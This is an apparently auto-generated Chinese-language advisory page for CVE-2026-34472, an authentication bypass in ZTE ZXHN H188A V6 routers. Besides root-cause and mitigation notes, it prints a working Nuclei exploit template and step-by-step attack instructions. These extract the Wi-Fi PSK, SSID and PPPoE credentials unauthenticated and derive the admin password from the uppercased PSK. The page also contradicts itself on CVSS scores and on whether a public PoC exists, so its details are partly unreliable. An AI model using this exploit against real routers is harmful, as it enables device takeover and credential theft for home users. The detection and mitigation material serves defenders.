[local] ZTE ZXHN H188A V6 - Authentication Bypass
ZTE ZXHN H188A V6认证绕过漏洞(CVE-2026-34472)分析:攻击者可利用_type和_tag参数未授权获取Wi-Fi PSK、PPPoE凭证,进而获得管理员权限。影响V6.0.10P2_TE及P3N3_TE版本,暂无官方补丁。
ZTE ZXHN H188A V6路由器存在认证绕过漏洞,未授权请求可导致Wi-Fi密码和PPPoE凭证泄露。
Critical · CVSS 9.8📋 漏洞基础信息
| CVE | CVE-2026-34472 |
|---|---|
| 漏洞类型 | 认证绕过 |
| 受影响版本 | ZTE ZXHN H188A V6.0.10P2_TE, V6.0.10P3N3_TE |
| 危害等级 | Critical · CVSS 9.8 |
| 发布日期 | 2026-05-29 |
| 提交者 | Mina Nageh Salalma (Monx Research) |
| 来源 | Exploit-DB 原文 ↗ |
🔬 漏洞根因
router_logic_impl.lua接受未经身份验证的请求中的_type和_tag参数,用于空路径请求;urlpath_2type_modifier.lua仅在_type缺失时应用QuickSetupEnable检查。攻击者通过构造_type=loginData和_tag=login_entry可绕过验证,触发预登录向导处理程序,暴露getPassword、wlan_get、ppp_get等凭证读取操作。
🎯 攻击场景
1. 攻击者确定目标ZTE H188A路由器的IP地址。2. 向根路径(/)发送POST请求,参数包含_type=loginData和_tag=login_entry。3. 请求体包含IF_ACTION=getPassword、_InstID_PASS=DEV.WIFI.AP1.PSK1、PASSTYPE=PSK。4. 服务器返回Wi-Fi预共享密钥(PSK)。5. 将Wi-Fi密码转换为大写获得管理员默认密码。6. 使用管理员密码登录路由器Web界面完全控制。
💥 漏洞影响
未授权攻击者可以远程获取Wi-Fi密码(PSK)、SSID和PPPoE用户名。Wi-Fi密码大写后即为管理员默认密码,导致路由器完全控制,包括修改配置、监听流量、发起进一步攻击。约500台公开暴露的设备受影响。
⚔️ Nuclei Exploit 模板
以下为标准 Nuclei v3 格式的利用模板,可直接用于漏洞验证:
id: CVE-2026-34472-exploit
info:
name: ZTE ZXHN H188A V6 - Authentication Bypass Exploit
author: monx
severity: high
description: Exploits authentication bypass to disclose WLAN PSK, SSID, and PPPoE credentials from ZTE ZXHN H188A V6 routers. The extracted Wi-Fi password can be uppercased to derive the admin password.
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34472
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2026-34472
tags: cve,cve2026,zte,h188a,router,auth-bypass,creds
http:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
IF_ACTION=getPassword&_InstID_PASS=DEV.WIFI.AP1.PSK1&PASSTYPE=PSK
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
IF_ACTION=wlan_get&_InstID_WLAN=DEV.WIFI.AP1
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
IF_ACTION=ppp_get&_InstID_PPP=DEV.PPPOE
payloads:
_type:
- loginData
- loginData
- loginData
_tag:
- login_entry
- login_entry
- login_entry
attack: pitchfork
stop-at-first-match: false
matchers:
- type: word
words:
- '"IF_RESULT":"OK"'
- '"PASSWORD"'
condition: and
match-all: true
extractors:
- type: regex
part: body
name: wlan_psk
regex:
- '"PASSWORD":"([^"]+)"'
- type: regex
part: body
name: wlan_ssid
regex:
- '"SSID":"([^"]+)"'
- type: regex
part: body
name: pppoe_username
regex:
- '"USERNAME":"([^"]+)"'
- type: regex
part: body
name: pppoe_password
regex:
- '"PASSWORD":"([^"]+)"'🔬 深度技术分析
1. 定义目标函数exploit(target),接受路由器IP作为参数。2. 构造URL http://<target>/ ,利用根路径绕过。3. 设置params字典包含_type=loginData和_tag=login_entry,触发向导处理程序。4. 设置Content-Type头为application/x-www-form-urlencoded。5. 构造POST数据:IF_ACTION=getPassword请求密码操作,_InstID_PASS=DEV.WIFI.AP1.PSK1指定Wi-Fi PSK对象,PASSTYPE=PSK指定密钥类型。6. 发送POST请求并输出响应内容(前2000字符),响应中即包含Wi-Fi密码。
🔍 Nuclei Detection 模板
以下为漏洞探测模板,用于判断目标是否受影响:
id: CVE-2026-34472-detection
info:
name: ZTE ZXHN H188A V6 - Authentication Bypass Detection
author: monx
severity: high
description: Detects ZTE ZXHN H188A V6 firmware versions vulnerable to authentication bypass via wizard credential disclosure.
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-34472
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2026-34472
tags: cve,cve2026,zte,h188a,router,auth-bypass
http:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
IF_ACTION=getPassword&_InstID_PASS=DEV.WIFI.AP1.PSK1&PASSTYPE=PSK
payloads:
_type:
- loginData
_tag:
- login_entry
attack: pitchfork
matchers:
- type: word
words:
- '"PASSTYPE":"PSK"'
- '"PASSWORD"'
- '"IF_RESULT":"OK"'
condition: and
extractors:
- type: regex
part: body
regex:
- '"PASSWORD":"([^"]+)"'
- '"SSID":"([^"]+)"'🛡️ 修复建议
1. 官方需发布固件更新修复router_logic_impl.lua中_type和_tag参数处理逻辑,在未认证时拒绝所有向导操作请求。2. 临时缓解措施:禁用WAN端Web管理接口,限制管理页面仅从LAN访问;使用强密码并定期更改。3. 关注ZTE官方安全公告获取补丁版本(目前无补丁)。
📎 参考链接
- https://www.cve.org/CVERecord?id=CVE-2026-34472
- https://github.com/minanagehsalalma/cve-2026-34472-auth-bypass-zte-h188a-router
- Exploit-DB 原文
🚨 威胁评估
| 📈 EPSS 利用概率 | 暂无数据 |
| 🚨 CISA KEV | 未被已知利用 |
| 🔧 公开 PoC | 暂无公开 PoC |
⚠️ 本文基于公开漏洞数据库,仅供安全研究与防御参考。生成时间: 2026-05-31 08:12 | 来源: Exploit-DB
🤖 常见问题解答(FAQ)
❓ 如何检测该漏洞的利用尝试?
监控对根路径的POST请求,参数包含_type=loginData和_tag=login_entry,以及Body中IF_ACTION=getPassword等特征字符串。
❓ 漏洞的根本原因是什么?
router_logic_impl.lua未校验请求来源,直接处理_type和_tag;当_type存在时绕过QuickSetupEnable检查,未认证用户即可触发向导凭证读取。
❓ 是否有临时缓解措施?
禁用WAN口Web管理,限制管理界面仅LAN访问。在WAF/IPS中添加规则拦截_path=/且参数含_type=loginData的请求。